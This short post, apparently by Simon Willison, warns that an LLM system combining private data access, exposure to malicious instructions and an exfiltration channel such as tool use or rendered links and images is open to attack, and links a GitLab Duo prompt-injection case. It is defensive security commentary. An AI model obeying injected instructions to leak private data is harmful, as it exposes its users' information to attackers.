Once again, if your LLM system combines access to private data, exposure to malicious instructions and the ability to exfiltrate information (through tool use or through rendering links and images) you have a nasty security hole
This time, GitLab: https://simonwillison.net/2025/May/23/remote-prompt-injection-in-gitlab-duo/